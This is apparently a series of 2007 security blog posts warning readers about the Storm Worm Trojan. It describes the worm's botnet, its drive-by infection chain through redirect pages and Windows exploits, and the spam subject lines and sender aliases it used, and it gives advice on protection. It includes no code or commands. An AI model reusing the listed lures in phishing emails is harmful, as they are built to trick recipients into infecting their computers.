The Trojan now called the "Storm Worm" got it's name after a huge spam run on Friday, January 19, 2007, which used the subject line "230 dead as storm batters Europe," to trick people into clicking on links to supposedly read news articles and emergency bulletins about the terrible storms that ravaged Europe during that week. By the following Monday the Storm Worm accounted for 8% of all spam, on a global basis. It received even more notoriety when it was used by infected zombie computers, all members of a BotNet using the eDonkey/Overnet P2P protocol, to launch DDoS attacks against several well known anti spam websites, from January through June, 2007. In fact, some of those attacks are still ongoing against Spamhaus and CastleCops.

How the Storm Worm is able to carry out such large scale attacks is directly related to it's success in getting a huge installed base of zombie computers, with different security sources giving varying numbers of infected machines ranging from 2 to 20 million. Either number is too many. There are enough members of the Storm Worm Botnets to bring down an entire country! This has been done entirely by using social engineering tricks to deceive people into clicking on links in spam emails, which lead the victim to other infected computers, where they become infected and join the largest peer-to-peer Botnet ever assembled in the history of Botnets. Each new member of this network receives copies of the Storm Worm Trojan Downloader, a copy of the Nginx web server, an email address collection program, a spam sending program (SMTP Server), a DDoS tool, and connection scripts related to the P2P node in which it has been enlisted. All of these machines are remote controlled by criminal masterminds, known as "BotMasters." The owners of this Botnet are suspected of residing in various parts of the Former Soviet Union and are the most prolific spammers in the World.

Method of Infection

As I said in the previous paragraph, the Storm Worm spreads by tricking people into clicking on links to a web page hosted on an already infected computer, where they are then infected and zombified into the Botnet. There, they await remote control orders to do the bidding of the BotMaster. So how are these computers infected with the Worm/Trojan itself?

When a person using any version of Windows arrives at the fraudulant web page being hosted on a Storm Worm infected computer there are two things that can occur, depending on whether or not the visitor's browser has JavaScript enabled (most do, by default).

1. If JavaScript is disabled they will see a plain text message claiming that the website they want is undergoing some tests, or that an additional plug in or applet is needed to view the content they were enticed with, followed by a text link to click to manually get or see the needed file, or applet. Now, what should I do? It says to click here, but I don't know if I should or not... Oh well, I'll just try it real fast to see what it does and back out if it doesn't look right -> "Click" ... They just infected themselves with the Storm Worm! Idiots!


2. If JavaScript is enabled a script will instantly redirect them to a foreign server which is acting as a Worm host for their Botnet node. Once there their browser will be subjected to at least three attempts to exploit different known vulnerabilities in unpatched Windows computers. Chances are very good that one of these attempts will be successful, unless the computer is very well protected and completely up to date with all available Windows Patches and Internet Explorer 7 with all patches installed. Older versions of Firefox may also be at risk (prior to 2.0.0.6), if JavaScript is enabled, because the script initiates a file download. If the victim arrives using an older, unsupported version of Windows (9x, M.E, 2000 before SP4, or XP with SP1), or is running an invalid pirated copy of Windows XP, they will NOT be up to date with critical patches and WILL probably be infected immediately (except for Limited User or Power User accounts).
   

Now that we know how Windows computers get infected, what are some of the current social tricks being used to fool people into (A) opening the message, (B) reading it and (C) Clicking on the obviously strange numeric link.

Subjects recently used in the Storm Worm e-mail messages include:
Postcard scams:
You've received a (postcard, ecard, greeting card) from a (Friend, Worshipper, Mate, Class-Mate, Family Member, etc).

Newest scam subjects as of mid-August, 2007:
Cat Lovers, Dated Confirmation, Internal Support, Internal Verification, Login Info, Login Information, Login Verification, Member Confirm, Member Details, Member Registration, Membership Details, Membership Support, New Member Confirmation, New User Confirmation, New User Details, New User Letter, New User Support, Poker World, Registration Confirmation, Registration Details, Secure Registration, Tech Department, Thank You For Joining, User Info, User Verification, Your Member Info, Welcome New Member

And the senders aliases have been:

Bartenders guide, Bartenders Guide, Coolpics, Dog lovers, Entertaining pics, Entertaining pros, Fun World, Free ringtones, Free web tools, Game Connect, Internet Dating, Job search pros, Joke-a-day, Mobile Fun, MP3 world, Net gambler, Net-jokes, Online hook-up, Poker world, Resume Hunters, Ringtone heaven, Web, Web cooking, Web connects, Webtunes, Wine Lovers

To learn more about the payload delivered when a PC is infected with the Storm Worm, read my extended comments...

Continue reading "Email Threat - Trojan-Downloader "Storm Worm" - It's History, Payload and Variants" »

Posted by Wiz at 12:35 AM | Permalink

back to top ^

On July 1, 2007, I wrote a blog article titled "Warning; Trojan in Email Link: You've received a greeting postcard from a family member!" For well over a month my various email accounts were inundated with a constant daily flow of these Postcard scams. There is now an entirely new variation of these threats, in circulation World wide. For those who for some reason don't know what this is about (what rock have you been hiding under?), read the next paragraph. If you understand the basic nature of this threat you can skip to my extended comments.

Since sometime in June this year a Trojan Horse threat, called the "Storm Worm Trojan," has been circulating across the Internet, infecting millions of Windows PCs along it's path. At first the subject and message body text referred to ecards, or (greeting) postcards supposedly sent to you from a "Friend," or "Worshipper," or "Class-Mate," or "Mate." They all provided a link (with a numeric IP address in the URL), to visit a website where you could view your card, which would remain viable for "the next 30 days." If you've been on the Internet for a long enough time you are probably aware that URLs are not usually numeric, but are in the form of named websites. Seeing a link that is numeric usually sets off alarm bells! A person would either have to be a total newbie to the Internet, or not accustomed to looking at the destination of links in their email client's status bar, or are using browser based email that does not reveal the destination of links found in emails. Maybe the person receiving that email is a young child who isn't aware of the danger of such links and was excited to think they had received a greeting card.

Anybody who was tricked into clicking on the link was transported to a web page hosted on a compromised zombie computer on a home or business broadband network, located at the numeric IP found in the link they clicked on. This computer is already infected with the Storm Worm and has had a micro Web Server installed on it and is hosting a single web page. That web page contains JavaScript redirection codes and a plain text link to a copy of the Worm that has been placed on that computer. People going to that hostile web page with JavaScript disabled will see the link and the text will urge them to click on it to see their (ecard/message). If the victim arrived using a browser with JavaScript enabled, as most are, a hidden script on that page would send their browser to yet another website, where an image of a fake greeting card, or text about it is displayed. What the victim didn't know is that while they were looking at the fake ecard a hidden download was occurring that was automatically infecting their computer with the Storm Worm Trojan. This turned their computer into both a host of a similar redirection web page and as a sender of spam emails containing a link to their hostile web page, but sent through another compromised computer somewhere else in the World.

Judging by the millions of infected computers hosting these hostile web pages and sending spam links out, there are a lot of folks who have not been practicing "safe hex" (computing). They have not been keeping their Windows computers thoroughly updated and patched, and are not running up-to-date security software (both definitions and program updates). Read the tips in my extended comments about securing your PCs against this and other modern threats to your security.

Continue reading "Beware of new variations of Storm Worm Trojan email threats" »

Posted by Wiz at 2:28 PM | Permalink

back to top ^

If (rather, when) you receive an email with a subject line that matches or closely matches this:

You've received a greeting postcard from a family member!
or
You've received a postcard from a family member!

DELETE IT! These messages are sent from infected computers and contain links to go to a web page that is hosted on some poor schmuck's personal computer, on a broadband ISP connection, possibly with a static IP address. That web page contains exploit code that is used to download a Trojan Horse remote control program onto your computer. The bait is that a "family member" has just sent you a (greeting) postcard and there is a link to copy and paste into your browser's address bar (or to click on). If you mouse over that link you will see the numeric IP address in it. I have analyzed several of these recent spam messages and learned that they either point to a .hk (Hong Kong) domain, or a numeric IP address, followed by a question mark and a long group of hexidecimal characters (referred to as your card's claim number). The destinations are usually US based broadband customers' home computers that have had a (proxy) server surreptitiously installed, without the owner's knowledge. The one's I have looked at use a freeware server called "nginx." The web page they serve up contains a link to a copy of the Trojan program and deals with both people lacking and people having JavaScript enabled browsers. If you visit the link without JavaScript you will see a message that if you don't see your card you should click on a link. That link goes directly to an infected file on the hijacked computer. If you visit the page with JavaScript enabled you will be in danger of becoming infected by the JavaScript exploit that is encoded into a huge line of hostile code.

My advise, other than not even opening messages with the above mentioned subject lines, is to keep updated anti virus (and anti Trojan) and anti spyware programs running at all times on your computers. If you use Outlook (Express) or a similar stand alone email client you should add a spam/virus screening front-end program, like MailWasher Pro, which I use. MailWasher Pro uses a combination of an intelligent learning filter, blacklists of known spam, a virus detector, plain text display of messages and source codes, and best of all - user configurable filter rules. I have authored two sets of custom MailWasher filter rules. My filter rules are updated frequently to respond to the latest spam and scam threats and are available online, on my MailWasher Filters page. It was the ability to read incoming email source codes in MailWasher Pro that allowed me to discover the nature of these greeting postcard threats.

I hope this saves somebody from the misery of having their computer taken over due to ignorance and unpreparedness. Stay alert and keep your anti malware defenses running and up to date at all times. Assume that "they" are out to get you, because they are! If you receive a notice from your ISP that they suspect that your computers are sending out harmful messages - have the computers checked for proxy servers. Stay off-line until all vestiges of such programs have been completely removed, then equip your computers with the best security programs you can afford. There are links all over this page and others of mine for Spy Sweeper, Spyware Doctor, Norton Anti Virus and other similar products. Some offer a free trila, so use it, then purchase a subscription. Don't let your computers become unwitting members of zombie BotNets for use as spam/virus relays, or hosts for spamvertised websites.

Continue reading "Warning; Trojan in Email Link: You've received a greeting postcard from a family member!" »

Posted by Wiz at 4:57 PM | Permalink

back to top ^